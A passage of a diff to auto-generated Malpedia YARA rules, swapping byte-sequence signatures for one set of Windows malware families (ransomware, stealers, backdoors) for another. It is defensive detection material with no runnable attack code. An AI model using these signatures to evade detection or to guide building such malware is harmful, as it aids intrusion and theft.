488d8dc8000000 ba1c000000 488905???????? e8???????? 488bcb 488bd0 ff15???????? } - $sequence_5 = { 3c41 7c04 3c5a 7e08 3c30 7c19 3c39 } - $sequence_6 = { 6683f81a 72e3 0fb7c3 4883c420 } - $sequence_7 = { c745303ae47159 c7453474b06493 c745380897878b c6453c5b e8???????? 488bc8 } - $sequence_8 = { c7450f86f5e3e6 c74513a93633c4 c7451793554020 c7451b48549c39 c7451faaa5f9c7 } - $sequence_9 = { 488d4dc8 ba0c000000 488905???????? e8???????? 488bcb 488bd0 ff15???????? } + $sequence_0 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 } + $sequence_1 = { 894df4 8a15???????? 8855f8 837d0c01 7514 8bf4 68???????? } + $sequence_2 = { 8855f8 837d0c01 7514 8bf4 } + $sequence_3 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 } + $sequence_4 = { 8855f8 837d0c01 7514 8bf4 68???????? } + $sequence_5 = { 68???????? ff15???????? 3bf4 e8???????? b801000000 52 8bcd } + $sequence_6 = { 0909 0909 0407 0807 8d4900 4f } + $sequence_7 = { 8a15???????? 8855f8 837d0c01 7514 8bf4 } + $sequence_8 = { 8945f0 8b0d???????? 894df4 8a15???????? 8855f8 837d0c01 7514 } + $sequence_9 = { 7514 8bf4 68???????? ff15???????? 3bf4 e8???????? b801000000 } condition: - 7 of them and filesize <1606656 + 7 of them and filesize <1433600 } -rule MALPEDIA_Win_Satana_Auto : FILE +rule MALPEDIA_Win_Bootwreck_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d19234af-c9bd-5654-81eb-f961478057fe" + id = "7e23b82b-3bdc-58cd-906f-3ab5825b9ffb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.satana_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bootwreck_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "bdc48675727bdd579a6ca8ed3a223cef8d8ab6026da5d019b40d5fe8d696eb85" + logic_hash = "49dbec8ae0163fe1b10f7b427af3210b6bbd81884139d209319f2b77e78ba995" score = 75 quality = 75 tags = "FILE" @@ -132775,32 +135435,32 @@ rule MALPEDIA_Win_Satana_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b3d???????? 90 ffd6 68e8030000 ffd7 } - $sequence_1 = { ff15???????? 8b459c 50 ff15???????? 8b4ddc 010d???????? } - $sequence_2 = { 8d8c2468020000 51 e8???????? 8b442410 8d542418 52 } - $sequence_3 = { 8b5108 ffd2 6a00 8b45fc 8b480c ffd1 8be5 } - $sequence_4 = { 68???????? e8???????? 83c414 53 6880000000 } - $sequence_5 = { 83c002 663bcb 75f1 8d8de89effff 51 e8???????? } - $sequence_6 = { 57 50 68???????? e8???????? 83c414 833d????????00 745a } - $sequence_7 = { ffd3 8bf8 a1???????? 57 } - $sequence_8 = { 105353 bf60600157 ff7528 fc ffd6 0105???????? f8 } - $sequence_9 = { ff15???????? e8???????? 837de401 0f8e12030000 8b4704 } + $sequence_0 = { 33ff 897dfc 3b1cfde0c18100 7409 47 897dfc } + $sequence_1 = { 8d642428 0f8409000000 660fbec2 86c7 8b4510 55 660fb6da } + $sequence_2 = { 85b178373e03 025ad9 7efa 99 18c7 7e55 } + $sequence_3 = { c74424147d978300 682dedfcaa 9c 89442418 9c 9c ff742420 } + $sequence_4 = { ee 5b 7f3f 99 68e43b3fa7 6c } + $sequence_5 = { 876c2428 66891c24 688106ab60 896c2428 5d 66896c2404 bd???????? } + $sequence_6 = { 8955fc f9 8d9b00000000 30e1 37 d4b7 8b4d08 } + $sequence_7 = { ff4638 88c3 66f7d6 b37c 5b 660fb6f9 5f } + $sequence_8 = { c25400 c7042400000000 60 8774241c 8d64241c 0f8103500500 } + $sequence_9 = { 8d041f f7c5036c87b2 99 84ed f8 60 6681fb744d } condition: - 7 of them and filesize <221184 + 7 of them and filesize <10821632 } -rule MALPEDIA_Win_Asprox_Auto : FILE +rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "828c56dd-0390-5296-8de7-1a48d10f0f57" + id = "c75b333a-682d-594f-91c1-b34498f1ad6e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.asprox_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snowflake_stealer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "3b610e4cac05eeb099f6aceb2af12383510de1c04c209adb95ec16fa7dbc09d7" + logic_hash = "245c81a71d2d7616cdb88580467328ff9d430753f4cd71b549a9003edd26959a" score = 75 quality = 75 tags = "FILE" @@ -132814,32 +135474,32 @@ rule MALPEDIA_Win_Asprox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 740f 6a00 ff15???????? 50 ff15???????? ff15???????? } - $sequence_1 = { ff15???????? 6a00 6a00 8b5518 52 8b45c4 } - $sequence_2 = { 898558ffffff 8b8560ffffff 898570ffffff 8b4ddc 898d30ffffff c78534ffffff00000000 } - $sequence_3 = { 0fb655fd 83fa01 0f8503010000 c6859ffeffff00 68???????? ff15???????? 8985a4feffff } - $sequence_4 = { ff45fc 83c004 817dfcff000000 7ede 83a34404000000 ba00010000 8d8348040000 } - $sequence_5 = { 8d849d20feffff 894dc0 8945b0 8b00 8bcf 2bc8 895dbc } - $sequence_6 = { 51 8b952cffffff 52 ff15???????? 898558ffffff 8b8560ffffff 898570ffffff } - $sequence_7 = { 57 395d08 0f8498000000 8b750c 3bf3 0f848d000000 8b7d10 } - $sequence_8 = { 50 ff15???????? 898558ffffff 8b4dd8 } - $sequence_9 = { 8d840a00100000 50 6a00 8b0d???????? 51 ff15???????? 8945fc } + $sequence_0 = { f20f114740 0fb64111 894738 89473c ff5308 8b542418 59 } + $sequence_1 = { f30fe6c0 660f2fc8 7623 84d2 750a f30f1048fc 0f5ac9 } + $sequence_2 = { f20f1000 f20f1106 8b4008 c7030a000000 894608 53 56 } + $sequence_3 = { eb54 8b54241c 8d4c2474 e8???????? 8b44247c 8b8c2480000000 31f6 } + $sequence_4 = { ff753c ff74241c e8???????? 59 59 83650800 83650c00 } + $sequence_5 = { ff7010 ff700c ff7110 ff710c ff7608 ff560c 83c414 } + $sequence_6 = { ff750c e8???????? 83c410 5f 8bc6 5e 5b } + $sequence_7 = { ff742428 e8???????? 50 53 56 e8???????? 8bd8 } + $sequence_8 = { c745f001000000 894ddc 51 8945e0 ff500c 83c404 8b45e0 } + $sequence_9 = { ff7310 e8???????? 8bf0 83c40c 85f6 756f 55 } condition: - 7 of them and filesize <155648 + 7 of them and filesize <6196224 } -rule MALPEDIA_Win_Voidoor_Auto : FILE +rule MALPEDIA_Win_Powersniff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "71f97a7b-09b8-5977-a64d-26462fe6285b" + id = "1afa4094-a9fd-5e6f-8667-60dff005c0b1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.voidoor_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powersniff_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "c8a62c7797e4a86d80b8a858487a45d1e5042e60b70ed193ca612e4172a00dd8" + logic_hash = "7ad286ca27751eb193f2579d1930e5287fef0e22f2b28df0af9c7874b91d42c3" score = 75 quality = 75 tags = "FILE" @@ -132853,71 +135513,71 @@ rule MALPEDIA_Win_Voidoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c410 83bfb40b000000 752e ff33 83bf500b000000 ffb608400000 } - $sequence_1 = { c645fc10 e8???????? c78574feffff0f000000 c78570feffff00000000 c68560feffff00 8d9560feffff 8d8d78feffff } - $sequence_2 = { 03f5 7458 803e2f 7509 83f804 7d04 40 } - $sequence_3 = { 55 8bd8 ff15???????? 83c414 85db 0f85c3010000 8b542440 } - $sequence_4 = { 8b742414 c744240800000000 83bec802000000 8b1e 57 8b834c010000 8dbe68050000 } - $sequence_5 = { c60201 8b10 2bca 83f906 7d0a b801000000 5e } - $sequence_6 = { 33c0 5f 59 c3 56 57 e8???????? } - $sequence_7 = { b91b000000 5e 0f44d9 5d 8bc3 5b 83c408 } - $sequence_8 = { e8???????? 83c40c 89442418 8983ac030000 68???????? 53 e8???????? } - $sequence_9 = { c6434501 3944241c 7520 85f6 0f8565ffffff 837c243020 7337 } + $sequence_0 = { 53 ff35???????? 8945f8 895dfc } + $sequence_1 = { 8b45f4 b94d5a0000 663908 7405 6a0b 5b eb0f } + $sequence_2 = { 53 56 8b35???????? 57 8d85d8fdffff 50 33db } + $sequence_3 = { c1eb10 8975fc 8b75f8 c1ee18 8b34b590780010 0fb6db } + $sequence_4 = { 50 8d45f8 50 ff75fc e8???????? 8bd8 3bde } + $sequence_5 = { c745fc08000000 eb09 ff15???????? 8945fc 8b45fc 5f 5e } + $sequence_6 = { ff15???????? 8bf8 897df0 3bfb 7435 8d4508 50 } + $sequence_7 = { 55 8bec 83ec0c 8b473c 03c7 53 8b9880000000 } + $sequence_8 = { ff15???????? 85c0 0f84b4000000 8d8590feffff 50 ffd3 034574 } + $sequence_9 = { a1???????? 53 68???????? ff750c 8945f8 ff7508 } condition: - 7 of them and filesize <1744896 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Unidentified_102_Auto : FILE +rule MALPEDIA_Win_Poortry_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "68f5ede2-e772-5b9c-86c7-72da7d6ddaff" - date = "2023-07-11" - modified = "2023-07-15" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_102_auto.yar#L1-L130" + id = "2cf345f6-6c65-548f-9e1e-6a67040df1b7" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poortry" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poortry_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "7cf959abf8b06a75a101a66334f27ae5601df812c1ddb140fd9298ef735bb0dc" + logic_hash = "3ea6c4ba39d0058f0069c86346c9de0810387b212bcc1f7c57e5a516c20ae9ad" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230705" - malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" - malpedia_version = "20230715" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6bd238 8b0c8d187b0410 88441129 8b0b 8bc1 c1f806 } - $sequence_1 = { 83c408 8bb5e8fdffff 8dbdd8fdffff 83bdecfdffff10 c745b000000000 0f43bdd8fdffff } - $sequence_2 = { 8bf3 6bf938 c1fe06 6a00 8b0cb5187b0410 ff740f24 } - $sequence_3 = { 894610 c7461407000000 668906 e9???????? 837f1410 8bcf 7202 } - $sequence_4 = { c785e4fbffff07000000 8d5102 668985d0fbffff 6690 668b01 83c102 6685c0 } - $sequence_5 = { 8d85e8e7ffff 68???????? 50 ff15???????? 83c410 8d8594e7ffff 50 } - $sequence_6 = { 0f1085b0fcffff 0f1100 8bc4 0f108590fcffff 51 0f1100 ff5228 } - $sequence_7 = { 83c408 8b95dcfeffff 83fa10 722f 8b8dc8feffff 42 8bc1 } - $sequence_8 = { 6a00 68???????? 6802000080 c785c8e7ffff3f000f00 ff15???????? 85c0 0f84ef000000 } - $sequence_9 = { 8d45f4 64a300000000 8965f0 8b4510 8b4d18 8b5d0c } + $sequence_0 = { 41f7d2 f9 4181f80255e860 4181f225619d1f 41f7da f8 4181c2174c0279 } + $sequence_1 = { 66f7c4e120 310424 5e 41f6c105 443af4 4863c0 f5 } + $sequence_2 = { 66443bf0 56 0fbae697 c1e61f 311424 f9 660fbafec8 } + $sequence_3 = { 41f7d3 4151 450aca 6641d3e1 44311c24 4180d1a2 } + $sequence_4 = { f8 81f79e0d521c f8 d1cf 81c71d19891d f8 f5 } + $sequence_5 = { 4151 41c0e937 4d0fb7c9 313424 450fc0c9 66450fabf1 66410fbae1d7 } + $sequence_6 = { 4484c7 81c33f50eb3f 664181f8ec0e f7db 4153 311c24 6641c1c318 } + $sequence_7 = { 56 401af3 40d2e6 66f7c4e120 310424 5e 41f6c105 } + $sequence_8 = { 4123ea 48c1d5cd 5d f9 4d63c9 4881f98925786f 664185d3 } + $sequence_9 = { f6dd 4159 4084ee 40b5c4 9d 66400fbecd 59 } condition: - 7 of them and filesize <626688 + 7 of them and filesize <8078336 } -rule MALPEDIA_Win_Webc2_Div_Auto : FILE +rule MALPEDIA_Win_Nestegg_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ec34042e-e794-5a2f-acc9-f1f4c0dd235a" + id = "01b2e0f8-b92c-591f-a2fe-591e7cf3b6b4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_div_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nestegg_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "11aa7a8bbe87a55b44481499db0ce13e00127df87edb76e8d3596bc6375e5a87" + logic_hash = "d01d8400ee78b6e2d5585ed1b0eb91726b08169614c693b823bb545acd7b28b3" score = 75 quality = 75 tags = "FILE" @@ -132931,32 +135591,32 @@ rule MALPEDIA_Win_Webc2_Div_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5f e9???????? 6a3c 51 e9???????? 85c0 0f842c010000 } - $sequence_1 = { 81c2b4000000 69d260ea0000 895604 eb73 8d4505 50 } - $sequence_2 = { ff15???????? ff7508 8b35???????? 85c0 7512 } - $sequence_3 = { 771a 8b442414 0540f087fc 50 ffd5 015c2410 8144241460ce5800 } - $sequence_4 = { 894508 7509 57 ff15???????? eb54 a0???????? } - $sequence_5 = { 894c243c ff15???????? 85c0 5f 750a } - $sequence_6 = { f7d1 2bf9 8d95f0feffff 8bf7 8bfa 8bd1 } - $sequence_7 = { f7d1 49 8bf1 8d7e01 } - $sequence_8 = { 8885ecf9ffff 33c0 8dbdedf9ffff 8975f8 f3ab } - $sequence_9 = { 8bc5 bb16000000 99 f7ff 8bc1 8d3c9510114000 99 } + $sequence_0 = { e8???????? 8d5710 6a02 52 8bce e8???????? } + $sequence_1 = { 83c40c 83feff 7417 ffd7 } + $sequence_2 = { 8b0d???????? 81c120030000 51 ff15???????? 8b0d???????? 39991c030000 } + $sequence_3 = { 83f80e 0f84d8000000 83f80f 7520 8d4c2430 56 } + $sequence_4 = { 56 8bf1 89742404 c706???????? 8b8e24030000 c744241000000000 } + $sequence_5 = { 85c9 740c 8a09 83e107 8d14c1 89542410 } + $sequence_6 = { 8b10 6a10 51 8bc8 885c2458 ff5214 } + $sequence_7 = { c644242f6e c644243065 c644243233 884c2433 885c2434 88542435 } + $sequence_8 = { c644240d73 884c240e c644240f5f c644241033 } + $sequence_9 = { e8???????? 8d4c2410 6a04 51 8bce c7442418ff020001 e8???????? } condition: - 7 of them and filesize <32768 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Gspy_Auto : FILE +rule MALPEDIA_Win_Nemty_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3f030d66-0807-5220-809f-f602620cbb65" + id = "63cde4fd-76ae-5ec0-8a56-1ffc39628f31" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gspy_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nemty_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "74604d1b3decfab056910daf59a9f74fcce729f63057c78e0ce83dfa1bab2af0" + logic_hash = "ab3eef0d79392145b4ed1a1315366f250ca5ff150cf5d778f7e9e8528f09f4dc" score = 75 quality = 75 tags = "FILE" @@ -132970,32 +135630,32 @@ rule MALPEDIA_Win_Gspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 52 c70600000000 ff15???????? 8b4608 8b1d???????? 85c0 } - $sequence_1 = { 50 8d4c242c 51 e8???????? c744240812000000 eb2f 6a1c } - $sequence_2 = { 8d4c2404 51 6a00 50 ff15???????? a3???????? 85c0 } - $sequence_3 = { 8b542420 51 57 6800000220 52 e8???????? } - $sequence_4 = { ff15???????? 85c0 0f8408010000 56 57 50 e8???????? } - $sequence_5 = { 85f6 0f8434ffffff 83f8ff 750d 33c0 3806 } - $sequence_6 = { 0f87b0000000 833e00 89742410 76b3 8b4604 a900000c00 } - $sequence_7 = { 0f83ed000000 6a10 6a00 8d442440 50 e8???????? c744241468be4200 } - $sequence_8 = { 03cb 51 03d6 52 e8???????? 013e eb08 } - $sequence_9 = { 6801000080 c744242000000000 c744241c04000000 c744241801000080 83ceff ff15???????? 85c0 } + $sequence_0 = { 51 e8???????? 59 e8???????? 83c438 85c0 } + $sequence_1 = { 8945a4 a1???????? 59 bf???????? 8bca 83f810 7302 } + $sequence_2 = { 81ec18040000 a1???????? 33c5 8945fc 837d2010 8b4508 } + $sequence_3 = { 83781408 8b4810 57 7202 8b00 8b3d???????? 33db } + $sequence_4 = { 6a1c 99 5e f7fe 33db 895dd8 } + $sequence_5 = { 33ff e8???????? 83c61c 3b7510 75ef 6a00 } + $sequence_6 = { 83ec1c 8bd8 8bc4 68???????? e8???????? } + $sequence_7 = { 8db4248c000000 e8???????? 53 8d742454 } + $sequence_8 = { 7509 be???????? 85c0 7405 } + $sequence_9 = { 837d3810 8bf8 8b4524 59 7303 8d4524 837d3810 } condition: - 7 of them and filesize <421888 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Nokki_Auto : FILE +rule MALPEDIA_Win_Vyveva_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02120b2b-1366-521d-89f5-fe0cec012c20" + id = "5f920383-d05c-5c69-8d2c-6a773f2538b6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nokki_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vyveva_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "e29386a66940956320f6fdb11113fafeb375dcdfcfa05926d55033ad903bf7f3" + logic_hash = "9d5c74e05efbe3ba7525bfb04e432ddba69e01227882b7ebe7ef3564991f92e2" score = 75 quality = 75 tags = "FILE" @@ -133009,36 +135669,32 @@ rule MALPEDIA_Win_Nokki_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 33d2 68ce070000 52 } - $sequence_1 = { e8???????? 33c9 68ce070000 51 } - $sequence_2 = { 8b420c 898d08f8ffff b9???????? 89b518f8ffff ffd0 } - $sequence_3 = { 884c0204 8b06 8bd0 83e01f c1fa05 8b149580054100 c1e006 } - $sequence_4 = { 8d8daaddffff 51 668985a8ddffff e8???????? 6800010000 8d95f0feffff 6a00 } - $sequence_5 = { 6a01 6a00 ff15???????? 8bf8 85ff 0f848a000000 6a00 } - $sequence_6 = { 51 8d9520f8ffff 52 e8???????? 83c408 85c0 744a } - $sequence_7 = { ffd6 57 ffd6 68a0bb0d00 } - $sequence_8 = { 8a8c181d010000 888888054100 40 ebe6 ff35???????? } - $sequence_9 = { 33ff ffb7d4ec4000 ff15???????? 8987d4ec4000 83c704 83ff28 } - $sequence_10 = { 83c40c 6804010000 8d95f4fdffff 52 6a00 ffd6 } - $sequence_11 = { 8d7810 89bd68e8ffff 8b8d60e8ffff 8b9564e8ffff 8d856ce8ffff 50 } - $sequence_12 = { 8bce e8???????? 33d2 6806020000 52 8d85eafdffff 50 } - $sequence_13 = { 8d8df4fdffff 51 ffd3 8d95f4fdffff 68???????? } + $sequence_0 = { 58 ff7008 5a 8916 3b4808 7405 } + $sequence_1 = { 51 8f00 8b4c2408 85c9 7407 51 8f4004 } + $sequence_2 = { 57 56 51 55 59 e8???????? ff30 } + $sequence_3 = { 56 59 50 e8???????? 8d8c2494010000 6a04 } + $sequence_4 = { 740a 394424fc 7404 894424fc 83ec04 5d 83fdff } + $sequence_5 = { 83ec38 8b15???????? 8d442404 55 56 } + $sequence_6 = { 2bce 59 7409 33c9 8d4c0e04 83e904 ff5004 } + $sequence_7 = { 6a00 52 50 6a06 e8???????? 83c404 ffd0 } + $sequence_8 = { 59 c644247801 e8???????? 8b4c2434 8b442430 8d542428 894c242c } + $sequence_9 = { 7408 c70100000000 0101 83c008 85c0 7403 55 } condition: - 7 of them and filesize <454656 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Blackmagic_Auto : FILE +rule MALPEDIA_Win_Adhubllka_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dd528f6f-030a-5c0c-abc0-3a9e54fb0bef" + id = "e0dcc0bf-7466-5a17-86c8-1be553373dbc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackmagic_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.adhubllka_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "9b47417ce0472639cee5ef75e6c79509f45487b7ad058f003aa41d6f30ea451f" + logic_hash = "f57dac34b065a20905904e9bce7c25f2f5dcbcedcfe53619de18c646a0c360a6" score = 75 quality = 75 tags = "FILE" @@ -133052,32 +135708,32 @@ rule MALPEDIA_Win_Blackmagic_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d15b40c0700 488bcd e8???????? 488b4620 488903 488b5c2430 488b6c2438 } - $sequence_1 = { 4c8b01 ba01000000 41ff10 90 488bc7 488b4c2458 4833cc } - $sequence_2 = { 4863d0 488d4dd0 488b94d3086c0700 e8???????? 488b0d???????? 0fbe01 } - $sequence_3 = { 3bc3 740a 8b5c245c 85db 748d eb35 ff15???????? } - $sequence_4 = { 48895e08 488b4718 4c894010 488b4718 49894018 4c894718 49897810 } - $sequence_5 = { 0f114160 0f104070 488b8090000000 0f114170 0f118980000000 48898190000000 488d0587eaffff } - $sequence_6 = { 0f867d030000 458d7302 448d7d02 8bc5 4c8d1483 418b3a } - $sequence_7 = { 41f782b800000000080000 7427 498b8ad0000000 410fb6d3 e8???????? 440fb65c2430 0fbec8 } - $sequence_8 = { 488bd0 e8???????? 488b5308 498bce 482b13 48c1fa02 e8???????? } - $sequence_9 = { 4881f900100000 7223 488d4127 483bc1 0f8681000000 488bc8 e8???????? } + $sequence_0 = { e8???????? 8d8d60ffffff e8???????? 0f108560ffffff be18000000 0f1185c0feffff } + $sequence_1 = { 0f104590 0f118540ffffff 0f1045a0 0f118550ffffff e8???????? 83c404 8d8d60ffffff } + $sequence_2 = { 894d9c 8b4dbc 89458c 8b45c4 897d98 8b7dc0 } + $sequence_3 = { 7410 f745d800000002 7407 b801000000 eb02 33c0 } + $sequence_4 = { 03c2 898534ffffff 33c7 c1c008 898520ffffff 03c1 8b4ddc } + $sequence_5 = { 0fb605???????? c1e108 0bc8 0fb605???????? c1e108 0bc8 } + $sequence_6 = { e8???????? 83c404 0f57c0 660f138424501a0000 6a02 } + $sequence_7 = { 8d8d60ffffff e8???????? 8d8d60ffffff e8???????? 0f108560ffffff be04000000 0f118510ffffff } + $sequence_8 = { 0f1f440000 8b5cbc48 53 ff15???????? 83f801 } + $sequence_9 = { ffb590fdffff ff15???????? 85c0 0f8481fdffff 56 e8???????? } condition: - 7 of them and filesize <1416192 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Winordll64_Auto : FILE +rule MALPEDIA_Win_Satan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "32ecf8d5-2cad-5cae-b550-c4e57fba7837" + id = "ddfd46bc-87c6-53ce-9595-be9a6a99e4e0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winordll64" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.winordll64_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.satan_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "633c933d5010a60000a71f7674b6b6d81d1af8a3edb249e8b101bbf4eb8e443f" + logic_hash = "6170986a4237acbed4cbbf775dbbfb72e2b63776fab2b68ba052c6ad44853238" score = 75 quality = 75 tags = "FILE" @@ -133091,32 +135747,32 @@ rule MALPEDIA_Win_Winordll64_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 488d4dbc ff15???????? 488d15ae1c0100 488bc8 e8???????? 85c0 } - $sequence_1 = { 4833c4 488985581d0000 488bd9 b838070000 48ffc8 c6040100 75f7 } - $sequence_2 = { 48897c2420 ff15???????? 85c0 7426 448b842490000000 4c8d4c2430 } - $sequence_3 = { e9???????? ba12000000 ebf0 48897c2440 897c2448 488d442448 4889442420 } - $sequence_4 = { e8???????? 4c8d0513c50000 41b903000000 488d4c45bc 488bc1 492bc5 } - $sequence_5 = { 488bcf c744243001000000 448be8 ff15???????? } - $sequence_6 = { 663918 75f5 4c8d4da0 48837db808 4c0f434da0 486307 } - $sequence_7 = { 7423 83fefe 741e 488bce 488bc6 488d1554370100 83e11f } - $sequence_8 = { 7767 488d4d98 482bcb 48b8abaaaaaaaaaaaa2a 48f7e9 488bf2 } - $sequence_9 = { 0f84bd010000 488b4c2450 4533c0 418bd5 ff15???????? 85c0 0f847b010000 } + $sequence_0 = { e8???????? 8be5 5d c20800 8b45e4 c745b800000000 c745bc00000000 } + $sequence_1 = { 52 ff15???????? 8b4508 8b0c85e8c24700 83e102 740d 8d95e4dfffff } + $sequence_2 = { ffb5c4e7ffff 8985a0e7ffff ffb5bce7ffff c745ec04000000 } + $sequence_3 = { 57 50 8d45f4 64a300000000 8d4dd0 e8???????? } + $sequence_4 = { e8???????? 8b85acfeffff 83f810 7212 40 6a01 } + $sequence_5 = { eb9b 8b4dfc c1f906 8b55fc 83e23f 6bc230 03048d40e04700 } + $sequence_6 = { e8???????? 8845dc c745fc01000000 84c0 0f84b3010000 8d45d0 50 } + $sequence_7 = { 8d0c8584d64700 51 e8???????? 83c408 } + $sequence_8 = { 64a300000000 68b8000000 8d8598fdffff 6a00 50 e8???????? 68???????? } + $sequence_9 = { 8b5508 83e23f 6bd230 8b0c8d40e04700 8844112d 8b45ec d1e0 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <1163264 } -rule MALPEDIA_Win_Murkytop_Auto : FILE +rule MALPEDIA_Win_Unidentified_080_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "98a068e3-7271-5cdb-a55e-1253046c8910" + id = "b4f490ab-c91a-5e77-9e61-88b48864f732" date = "2023-12-06" modified = "2023-12-08" - reference = 